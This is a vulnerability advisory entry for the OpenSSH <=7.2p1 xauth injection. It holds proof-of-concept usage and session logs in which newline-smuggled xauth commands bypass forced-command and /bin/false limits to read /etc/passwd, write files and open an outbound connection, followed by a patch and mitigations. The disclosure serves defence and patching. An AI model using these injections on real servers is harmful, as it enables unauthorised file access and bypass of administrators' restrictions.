python 2.7.x * issue `#> pip install paramiko` to install `paramiko` ssh library for python 2.x * run `poc.py` Usage: <host> <port> <username> <password or path_to_privkey> path_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key poc: 1. configure one user (user1) for `force-commands` and another one with `/bin/false` in `/etc/passwd`: ```c #PUBKEY line - force commands: only allow "whoami" #cat /home/user1/.ssh/authorized_keys command="whoami" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user1@box #cat /etc/passwd user2:x:1001:1002:,,,:/home/user2:/bin/false ``` 2. run sshd with `X11Forwarding yes` (kali default config) ```c #> /root/openssh-7.2p1/sshd -p 22 -f sshd_config -D -d ``` 3. `forced-commands` - connect with user1 and display env information ```c #> python <host> 22 user1 .demoprivkey INFO:__main__:add this line to your authorized_keys file: #PUBKEY line - force commands: only allow "whoami" #cat /home/user/.ssh/authorized_keys command="whoami" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user@box INFO:__main__:connecting to: user1:<PKEY>@host:22 INFO:__main__:connected! INFO:__main__: Available commands: .info .readfile <path> .writefile <path> <data> .exit .quit <any xauth command or type help> #> .info DEBUG:__main__:auth_cookie: '\ninfo' DEBUG:__main__:dummy exec returned: None INFO:__main__:Authority file: /home/user1/.Xauthority File new: no File locked: no Number of entries: 1 Changes honored: yes Changes made: no Current input: (stdin):3 /usr/bin/xauth: (stdin):2: bad "add" command line ... ``` 4. `forced-commands` - read `/etc/passwd` ```c ... #> .readfile /etc/passwd DEBUG:__main__:auth_cookie: 'xxxx\nsource /etc/passwd\n' DEBUG:__main__:dummy exec returned: None INFO:__main__:root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync ... ``` 5. `forced-commands` - write `/tmp/testfile` ```c #> .writefile /tmp/testfile `thisisatestfile` DEBUG:__main__:auth_cookie: '\nadd 127.0.0.250:65500 `thisisatestfile` aa' DEBUG:__main__:dummy exec returned: None DEBUG:__main__:auth_cookie: '\nextract /tmp/testfile 127.0.0.250:65500' DEBUG:__main__:dummy exec returned: None DEBUG:__main__:/usr/bin/xauth: (stdin):2: bad "add" command line #> ls -lsat /tmp/testfile 4 -rw------- 1 user1 user1 59 xx xx 13:49 /tmp/testfile #> cat /tmp/testfile ú65500hiú65500`thisisatestfile`ª ``` 6. `/bin/false` - connect and read `/etc/passwd` ```c #> python <host> 22 user2 user2password INFO:__main__:connecting to: user2:user2password@host:22 INFO:__main__:connected! INFO:__main__: Available commands: .info .readfile <path> .writefile <path> <data> .exit .quit <any xauth command or type help> #> .readfile /etc/passwd DEBUG:__main__:auth_cookie: 'xxxx\nsource /etc/passwd\n' DEBUG:__main__:dummy exec returned: None INFO:__main__:root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin ... user2:x:1001:1002:,,,:/home/user2:/bin/false ... ``` 7. `/bin/false` - initiate outbound X connection to 8.8.8.8:6100 ```c #> generate 8.8.8.8:100 . #> tcpdump IP <host>.42033 > 8.8.8.8.6100: Flags [S], seq 1026029124, win 29200, options [mss 1460,sackOK,TS val 431416709 ecr 0,nop,wscale 10], length 0 ``` ### Troubleshooting **Q**: `ImportError: No module named py3compat` **A**: outdated `paramiko` please upgrade with `pip install --upgrade paramiko` ### Proposed Patch * Sanitize user-tainted input `s->auth_data`, `s->auth_proto`, `s->display` by replacing all non-printables by spaces. (I know this is kind of ugly ;)) ```c #> ~/openssh-7.2p1# diff -u session.c session.c.patched --- session.c 2016-02-17 11:32:11.616868923 -0500 +++ session.c.patched 2016-02-17 11:33:33.681596273 -0500 @@ -1327,6 +1327,18 @@ return env; } +char * +sanitize_non_printable(char *s) { + char *ptr = s; + while (*ptr != '\0'){ + if ((*ptr < 0x20)||(*s >= 0x7f )){ /* sanitizing \n would basically be enough */ + *ptr = ' '; + } + ptr++; + } + return s; +} + /* * Run $HOME/.ssh/rc, /etc/ssh/sshrc, or xauth (whichever is found * first in this order). @@ -1341,6 +1353,9 @@ do_xauth = s->display != NULL && s->auth_proto != NULL && s->auth_data != NULL; + sanitize_non_printable(s->display); + sanitize_non_printable(s->auth_proto); + sanitize_non_printable(s->auth_data); /* ignore _PATH_SSH_USER_RC for subsystems and admin forced commands */ if (!s->is_subsystem && options.adm_forced_command == NULL && !no_user_rc && options.permit_user_rc && ``` ### Mitigation / Workaround * disable x11-forwarding: `sshd_config` set `X11Forwarding no` * disable x11-forwarding for specific user with forced-commands: `no-x11-forwarding` in `authorized_keys` Notes ----- Verified, resolved and released within a few days. very impressive. Vendor response: see advisory [5] ### References [1] http://www.openssh.com/ [2] https://github.com/openssh/openssh-portable/blob/5a0fcb77287342e2fc2ba1cee79b6af108973dc2/session.c#L1388 [3] https://github.com/openssh/openssh-portable/blob/19bcf2ea2d17413f2d9730dd2a19575ff86b9b6a/clientloop.c#L376 [4] http://linux.die.net/man/1/xauth [5] http://www.openssh.com/txt/x11fwd.adv ### Contact https://github.com/tintinweb |
id | SSV:91041 |
last seen | 2017-11-19 |
modified | 2016-03-16 |
published | 2016-03-16 |
reporter | Root |
source | https://www.seebug.org/vuldb/ssvid-91041 |
title | OpenSSH <=7.2p1 xauth injection |
References
- http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/session.c
- http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/session.c
- http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/session.c.diff?r1=1.281&r2=1.282&f=h
- http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/session.c.diff?r1=1.281&r2=1.282&f=h
- http://lists.fedoraproject.org/pipermail/package-announce/2016-April/183101.html
- http://lists.fedoraproject.org/pipermail/package-announce/2016-April/183101.html
- http://lists.fedoraproject.org/pipermail/package-announce/2016-April/183122.html
- http://lists.fedoraproject.org/pipermail/package-announce/2016-April/183122.html
- http://lists.fedoraproject.org/pipermail/package-announce/2016-March/178838.html
- http://lists.fedoraproject.org/pipermail/package-announce/2016-March/178838.html
- http://lists.fedoraproject.org/pipermail/package-announce/2016-March/179924.html
- http://lists.fedoraproject.org/pipermail/package-announce/2016-March/179924.html
- http://lists.fedoraproject.org/pipermail/package-announce/2016-March/180491.html
- http://lists.fedoraproject.org/pipermail/package-announce/2016-March/180491.html
- http://lists.fedoraproject.org/pipermail/package-announce/2016-May/184264.html
- http://lists.fedoraproject.org/pipermail/package-announce/2016-May/184264.html
- http://packetstormsecurity.com/files/136234/OpenSSH-7.2p1-xauth-Command-Injection-Bypass.html
- http://packetstormsecurity.com/files/136234/OpenSSH-7.2p1-xauth-Command-Injection-Bypass.html
- http://rhn.redhat.com/errata/RHSA-2016-0465.html
- http://rhn.redhat.com/errata/RHSA-2016-0465.html
- http://rhn.redhat.com/errata/RHSA-2016-0466.html
- http://rhn.redhat.com/errata/RHSA-2016-0466.html
- http://seclists.org/fulldisclosure/2016/Mar/46
- http://seclists.org/fulldisclosure/2016/Mar/46
- http://seclists.org/fulldisclosure/2016/Mar/47
- http://seclists.org/fulldisclosure/2016/Mar/47
- http://www.openssh.com/txt/x11fwd.adv
- http://www.openssh.com/txt/x11fwd.adv
- http://www.oracle.com/technetwork/topics/security/bulletinapr2016-2952098.html
- http://www.oracle.com/technetwork/topics/security/bulletinapr2016-2952098.html
- http://www.oracle.com/technetwork/topics/security/linuxbulletinapr2016-2952096.html
- http://www.oracle.com/technetwork/topics/security/linuxbulletinapr2016-2952096.html
- http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html
- http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html
- http://www.securityfocus.com/bid/84314
- http://www.securityfocus.com/bid/84314
- http://www.securitytracker.com/id/1035249
- http://www.securitytracker.com/id/1035249
- https://bto.bluecoat.com/security-advisory/sa121
- https://bto.bluecoat.com/security-advisory/sa121
- https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115
- https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115
- https://lists.debian.org/debian-lts-announce/2018/09/msg00010.html
- https://lists.debian.org/debian-lts-announce/2018/09/msg00010.html
- https://security.gentoo.org/glsa/201612-18
- https://security.gentoo.org/glsa/201612-18
- https://www.exploit-db.com/exploits/39569/
- https://www.exploit-db.com/exploits/39569/
- https://www.freebsd.org/security/advisories/FreeBSD-SA-16:14.openssh.asc
- https://www.freebsd.org/security/advisories/FreeBSD-SA-16:14.openssh.asc